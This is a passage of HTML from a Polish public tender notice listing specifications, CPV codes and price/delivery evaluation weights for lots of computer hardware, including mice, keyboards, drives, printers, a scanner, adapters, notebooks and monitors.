class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4: Myszki, klawiatury:<br/>a) Fabrycznie nowa mysz komputerowa w ilości 30 szt., o minimalnych parametrach technicznych:<br/>Typ: optyczna,<br/>Komunikacja: beprzewodowa,<br/>Interfejs: 2.4 GHz, USB,<br/>Rozdzielczość: 1600 dpi,<br/>Ilość przycisków: 3 (w tym rolka nawigacyjna),<br/>Gwarancja: 24 miesiące.<br/><br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych.<br/><br/>b) Fabrycznie nowa klawiatura komputerowa w ilości 15 szt., o minimalnych parametrach technicznych:<br/>układ klawiszy: standardowy,<br/>klawisze numeryczne: tak,<br/>komunikacja z komputerem: przewodowa,<br/>interfejs: USB,<br/>długość przewodu: 1,8 m,<br/>gwarancja: 12 miesięcy.<br/><br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30237410-6 - Myszka komputerowa</p> <p class="mb-0">30237460-1 - Klawiatury komputerowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty dla każdej części Zamawiający będzie się kierował następującymi kryteriami oceny ofert:</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5: Dyski, pendrive:<br/>a) Fabrycznie nowy dysk zewnętrzny w ilości 1 szt. o minimalnych parametrach technicznych:<br/>Typ: M2;<br/>Pojemność: 500GB;<br/>Interfejs: USB 3.2 gen. 2;<br/>Szybkość odczytu: 1000 MB/s;<br/>Szybkość zapisu: 1000 MB/s;<br/>Gwarancja: 60 miesięcy<br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych.<br/><br/>b) Fabrycznie nowy dysk wewnętrzny w ilości 1 szt. o minimalnych parametrach technicznych:<br/>Typ: SSD;<br/>Format: M2;<br/>Pojemność: 1TB;<br/>Interfejs: PCIe NVMe 3.0 x4;<br/>Szybkość odczytu: 2100 MB/s;<br/>Szybkość zapisu: 1600 MB/s;<br/>Gwarancja: 60 miesięcy<br/><br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych.<br/><br/>c) Fabrycznie nowy dysk wewnętrzny w ilości 4 szt. o minimalnych parametrach technicznych:<br/>Format obudowy: 3,5”;<br/>Pojemność: 4TB;<br/>Interfejs: SATA 6 Gb/s;<br/>Klasa obr./min: 5400;<br/>Pamięć podręczna: 256 MB;<br/>Gwarancja: 36 miesięcy;<br/>Kompatybilność z NAS: QNAP TS-412;<br/><br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych.<br/><br/>d) Fabrycznie nowy pendrive w ilości 3 szt. o minimalnych parametrach technicznych: <br/>Interfejs: USB 3.2 typ A <br/>Pojemność: 512 GB <br/>Prędkość zapisu: do 900 MB/s <br/>Prędkość odczytu: do 1000 MB/s <br/>Gwarancja: 60 miesięcy <br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30234100-9 - Dysk magnetyczny</p> <p class="mb-0">30234600-4 - Pamięć flash</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty dla każdej części Zamawiający będzie się kierował następującymi kryteriami oceny ofert:</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 6: Drukarki:<br/>Fabrycznie nowe urządzenie drukujące w ilości 2 szt. o minimalnych parametrach technicznych:<br/><br/>Technologia druku: laserowa, monochromatyczna<br/>Obsługiwany typ nośnika: papier zwykły, papier gruby, etykiety, koperty<br/>Zainstalowana pamięć RAM: min. 64 MB<br/>Procesor: 500 MHz<br/>Obsługiwane formaty nośników: A6, A5, A4, B5, Legal, Letter, DL, 10 x 15 cm<br/>Podajnik papieru: 250 arkuszy<br/>Rodzaje podajników papieru: kasetowy<br/>Szybkość druku w mono: do 22 str/min - czerń i biel (ISO/IEC 24734) - A4 (210 x 297 mm), do 23 str/min - czerń i biel (ISO/IEC 24734) - ANSI A (Letter) (216 x 279 mm), do 23 str/min - czarno-białe - krajobraz A5, do 4 str/min - czarno-białe - A5 Portrait, do 14 cali na minutę - dupleks czerń i biel - A4 (210 x 297 mm), do 15 cali na minutę - dupleks czerń i biel - ANSI A (Letter) (216 x 279 mm)<br/>Maksymalna rozdzielczość druku: 600 x 600 dpi<br/>Miesięczne obciążenie: 250 - 25000 str./miesiąc<br/>Minimalny format nośnika (standardowo): 105 mm x 148 mm<br/>Gramatura papieru: 60 g/m² - 163 g/m²<br/>Druk dwustronny (dupleks): Automatyczny<br/>Wersja z WiFi: Tak<br/>Interfejsy: USB 2.0, LAN, Wi-Fi(n)<br/>Wyświetlacz: wbudowany<br/>Liczba wkładów drukujących: 1<br/>Dołączone akcesoria: kabel zasilający<br/>Drukarka musi spełniać wymogi drukowania kopert i zwrotek z systemu el-Dok firmy ZETO Lublin.<br/><br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30232110-8 - Drukarki laserowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty dla każdej części Zamawiający będzie się kierował następującymi kryteriami oceny ofert:</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 7: Skaner:<br/>Fabrycznie nowe urządzenie skanujące w ilości 1 szt. o minimalnych parametrach technicznych:<br/><br/>Typ produktu: skaner wykorzystujący aparat<br/>Materiały do skanowania: dokumenty, książki, czasopisma, formularze, faktury, certyfikaty, kody kreskowe wizytówki, kilka paragonów, nagrane filmy<br/>Matryca: CMOS × 2<br/>Liczba obiektywów: 2<br/>Łączna liczba pikseli: 2x16 megapikseli<br/>Łączna liczba pikseli (ekstrapolacja): 32 megapiksele<br/>Rozdzielczość: 4608 × 3456 pikseli<br/>DPI: 300<br/>Format skanowania: A3 i A4 + A5<br/>Maksymalny format skanowania: ≤ A3, 420 × 297 mm (16,5 × 11,7 cala)<br/>Liczba klatek na sekundę: 30<br/>Szybkość skanowania: poniżej 1 s<br/>Skanowanie wstępne: 0 s<br/>Wstępne rozgrzewanie lampy: Nie<br/>Format obrazu	: JPEG<br/>Głębia bitowa kolorów	: 24 bity<br/>Konwersja do formatu PDF: Tak<br/>Konwersja do formatu PDF z obsługą wyszukiwania tekstu: Tak<br/>Konwersja do pliku programu Word: Tak<br/>Konwersja do pliku programu Excel: Tak<br/>Konwersja do formatu JPG: Tak<br/>Konwersja do formatu MPG3: Tak<br/>Konwersja do formatu ePUB: Tak<br/>Format strumieniowego przesyłania wideo: Tak<br/>Maks. liczba klatek na sekundę: 30 KL./S<br/>Podgląd: Tak<br/>USB: USB 2.0 High-Speed<br/>Źródło światła	Wbudowane lampy: LED<br/>Górne lampy LED: Tak<br/>Tryb regulacji ostrości: stała ogniskowa<br/>Metoda skanowania: przycisk ręczny, przycisk nożny, przycisk programowy, skanowanie automatyczne<br/>Obsługiwane systemy operacyjne: Win 7/ 8/10, 32/64 bity; macOS 10.11 i nowsze<br/>Procesor: 32-bitowy procesor<br/>Laser – wspomagany: Tak<br/>Przycisk ręczny: Tak<br/>Przycisk nożny: Tak<br/>Podkładka pod czarne dokumenty: Tak<br/>IRIS OCR: Tak<br/>Języki funkcji OCR: 138 języków<br/>Prezenter wizualny: Tak<br/>Nagrywanie filmów: Tak<br/>Eksport filmów do formatu Quicktime: Tak<br/>Obsługa obrazu w obrazie: Tak<br/>Spłaszczanie krzywizn: Tak<br/>Inteligentne dzielenie stron: Tak<br/>Inteligentne korekty i automatyczne kadrowanie: Tak<br/>Profesjonalne przycinanie: Tak<br/>Czyszczenie tła: Tak<br/>Wspierane sztuczną inteligencją wykrywanie rąk: Tak<br/>Książka/dokument – tekst na mowę: Tak<br/>Usuwanie śladów palców: Tak<br/>Skanowanie kodów kreskowych: Tak<br/>Wyodrębnianie danych z kodów kreskowych:Tak<br/>Wyodrębnienie kilku kodów kreskowych: Tak<br/>Kadrowanie kilku paragonów: Tak<br/>Kadrowanie kilku wizytówek: Tak<br/>Eksport wizytówek do programu Outlook: Tak<br/>Tryb koloru: Tak<br/>Automatyczne skanowanie: Tak<br/>Skanowanie z wyborem ręcznym: Tak<br/>Dostosowanie ustawień jakości obrazu pod kątem słabego oświetlenia: Tak<br/>Obsługa nagrywania w trybie Full HD: Tak<br/>Zgodność z UVC (Zoom/Team/Skype/Google): Tak<br/>Wbudowany mikrofon: Tak<br/>Skanowanie dowodów tożsamości i paszportów: Tak<br/>Wyodrębnianie danych z dowodów tożsamości i paszportów: Tak <br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30216110-0 - Skanery komputerowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty dla każdej części Zamawiający będzie się kierował następującymi kryteriami oceny ofert:</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 8: Stacja dokująca, Hub USB, adaptery USB-C:<br/>a) Fabrycznie nowe urządzenie kopiujące w ilości 1 szt. o minimalnych parametrach technicznych:<br/><br/>Urządzenie musi posiadać kompatybilność z rozmiarami dysków SSD M.2:<br/>M.2 2280, M.2 2260, M.2 2242, M.2 2230, M.2 22110<br/>Interfejs obudowy: USB 3.1 Gen 2 (Typu-C)<br/>Interfejs dysku: M.2, M.2 NVMe<br/>Szybkość transmisji danych: NVME do 10Gb/s, NGFF do 5Gb/s<br/>Możliwość montażu dwóch dysków M.2<br/>Gwarancja: 24 miesiące (gwarancja producenta)<br/><br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych.<br/><br/>b) Fabrycznie nowy adapter w ilości 5 szt., o minimalnych parametrach technicznych:<br/>Zastosowanie: hub USB<br/>Złącze wejściowe: USB Typ A Męski<br/>Złącze wyjściowe: 4 x USB Typ A Żeński<br/>Standard: USB 3.2 Gen 1<br/>Gwarancja: 24 miesiące<br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych.<br/><br/>c) Fabrycznie nowy adapter w ilości 5 szt., o minimalnych parametrach technicznych:<br/>Zastosowanie: przesyłanie obrazu wideo<br/>Złącze wejściowe: USB Typ C Męski<br/>Złącze wyjściowe: HDMI Typ Żeński<br/>Standard: USB 3.1<br/>Gwarancja: 24 miesiące<br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych.<br/><br/>d) Fabrycznie nowy adapter w ilości 5 szt., o minimalnych parametrach technicznych:<br/><br/>Zastosowanie: przesyłanie obrazu wideo<br/>Złącze wejściowe: USB Typ C Męski<br/>Złącze wyjściowe: VGA Typ Żeński<br/>Standard: USB 3.1<br/>Gwarancja: 24 miesiące<br/><br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32331100-3 - Adaptery</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty dla każdej części Zamawiający będzie się kierował następującymi kryteriami oceny ofert:</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 9</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 9: Notebook:<br/>Fabrycznie nowy notebook w ilości 2 szt. o minimalnych wymaganiach technicznych:<br/><br/>Procesor: Procesor wielordzeniowy, osiągający w teście PassMark CPU Mark wynik min. 13000 punktów (ocena wg rankingu https://www.cpubenchmark.net/cpu_list.php z dnia 29.11.2024 r.);<br/>Pamięć RAM: 16 GB DDR4;<br/>Dysk twardy: 512 GB SSD;<br/>Wyświetlacz: 15,6”, 1920 x 1080 pikseli, matowy lub antyrefleksyjny;<br/>Komunikacja: Bluetooth 5, Wi-Fi 5, Ethernet 1Gbps ;<br/>Złącza: 1x HDMI, 2 x USB typ A (w tym min. 1 x USB 3.2 gen 1), 1 x USB typ C, 1 x Audio mini-jack, 1 x RJ-45, 1x zasilanie;<br/>Dodatkowe szczegóły: wielodotykowy touchpad, podświetlana klawiatura z wydzieloną klawiaturą numeryczną, wbudowane głośniki, wbudowany mikrofon, wbudowana kamera, szyfrowanie TPM 2.0, czytnik kart pamięci, zasilacz 65W; <br/>Dodatkowe wyposażenie: Mysz bezprzewodowa laserowa USB – 1szt.,dopasowana torba do notebooka z materiału odpornego na zachlapanie – 1 szt.;<br/>Gwarancja: 36 miesięcy typu door to door<br/><br/>Komputer musi mieć zainstalowany system operacyjny: Oryginalny Windows 11 Pro PL 64-bit z dożywotnią licencją lub równoważny*<br/>Parametry równoważności:<br/>Zainstalowany system operacyjny nie wymaga aktywacji za pomocą telefonu<br/>lub Internetu.<br/>Pełna integracja z systemami el-Dok, Turboewid, Płatnik, Bestia, Office 2021.<br/>Pełna obsługa ActiveX<br/>Wszystkie w/w funkcjonalności nie mogą być realizowane z zastosowaniem<br/>wszelkiego rodzaju emulacji i wirtualizacji Microsoft Windows 11.<br/><br/>Dożywotnia licencja pakietu oprogramowania biurowego typu Microsoft Office 2021 PL dla Użytkowników Domowych i Małych Firm lub równoważne.<br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213100-6 - Komputery przenośne</p> <p class="mb-0">48000000-8 - Pakiety oprogramowania i systemy informatyczne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">7 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty dla każdej części Zamawiający będzie się kierował następującymi kryteriami oceny ofert:</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 10</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 10: Monitory:<br/>a) Fabrycznie nowy monitor w ilości 1 szt. o minimalnych parametrach technicznych:<br/><br/>Typ: pojedynczy;<br/>Rozmiar: 34 cali;<br/>Rozdzielczość: 3440 x 1440 px (VA);<br/>Współczynnik wyświetlania: 21:9;<br/>Typ panelu: IPS; <br/>Typ ekranu: zakrzywiony (1500R);<br/>Powłoka ekranu: matowa;<br/>Podświetlenie ekranu: LED;<br/>Jasność: 300 cd/m2 (SDR);<br/>Głębia kolorów: 16.7 mln;<br/>HDR: tak, HDR Ready;<br/>Głośniki: nie;<br/>Obrotowy ekran: nie;<br/>Regulacja wysokości: tak, do 100 mm;<br/>Regulacja kąta pochylenia: tak, do ~5o do przodu/w dół, ~20o do tyłu/w górę;<br/>Regulacja kąta obrotu: nie;<br/>Black Stabilizer: tak;<br/>OSD Sidekick: tak;<br/>Picture-by-Picture: tak;<br/>Picture-in-Picture: tak;<br/>Technologia ochrony oczu: Redukcja migotania (Flicker free), filtr światła niebieskiego;<br/>Złącza: AC-in (wejście zasilania), HDMI 2.0, DisplayPort 1.4, Wejście słuchawkowe;<br/>Rama ekranu: monitor bezramkowy;<br/>Wyposażenie: 2 × kabel HDMI, 1 × kabel typu DisplayPort 1.4, 1 × kabel zasilający (AC-in);<br/>Gwarancja: 24 miesiące<br/><br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych.<br/><br/>b) Fabrycznie nowy monitor w ilości 2 szt. o minimalnych parametrach technicznych:<br/><br/><br/>Typ: pojedynczy;<br/>Rozmiar: 31,5 cali;<br/>Rozdzielczość: 3840 x 2160 px (UHD 4K);<br/>Współczynnik wyświetlania: 16:9;<br/>Typ panelu: IPS; <br/>Powłoka ekranu: matowa;<br/>Jasność: 250 cd/m2;<br/>Głębia kolorów: 1.07 mld;<br/>HDR: tak, HDR10;<br/>Głośniki: tak;<br/>Obrotowy ekran: tak (~90o w lewo, ~90o w prawo);<br/>Regulacja wysokości: tak, do 130 mm;<br/>Regulacja kąta pochylenia: tak, do ~25o do przodu/w dół, ~25o do tyłu/w górę;<br/>Regulacja kąta obrotu: tak, do ~280o w lewo, ~280o w prawo;<br/>Wbudowany HUB USB: tak;<br/>Wbudowany moduł Wi-Fi: tak;<br/>Black Stabilizer: tak;<br/>Technologia ochrony oczu: Redukcja migotania (Flicker free), filtr światła niebieskiego;<br/>Złącza: Dc-in (wejście zasilania), HDMI 2.0,Rj-45 (LAN), USB 2.0, USB Typu-C (z DisplayPort i Power Delivery);<br/>Rama ekranu: monitor bezramkowy;<br/>Wyposażenie: 1 × kabel HDMI, 1 × kabel typu USB-C, 1 × kabel zasilający, 1 x pilot;<br/>Gwarancja: 24 miesiące<br/><br/>Parametry nie mogą być gorsze od podanych w specyfikacji.<br/>W przypadku gdy w opisie do SWZ są użyte nazwy własne można je zastąpić innym sprzętem o parametrach równoważnych lub lepszych.<br/><br/>c) Fabrycznie nowy monitor w ilości 2 szt. o minimalnych parametrach technicznych:<br/>Przekątna ekranu: 21,5”<br/>Powłoka matrycy: matowa<br/>Typ ekranu: płaski<br/>Rozdzielczość: 1920x1080 px<br/>Format obrazu: 16:9<br/>Częstotliwość odświeżania: 75 Hz<br/>Technologia ochrony oczu: redukcja migotania<br/>Jasność: 250 cd/m2<br/>Kontrast statyczny: 3000:1<br/>Złącza: VGA, HDMI, DisplayPort, audio<br/>Wbudowane głośniki: tak<br/>Pivot: tak<br/>regulacja wysokości: tak<br/>regulacja pochylenia: 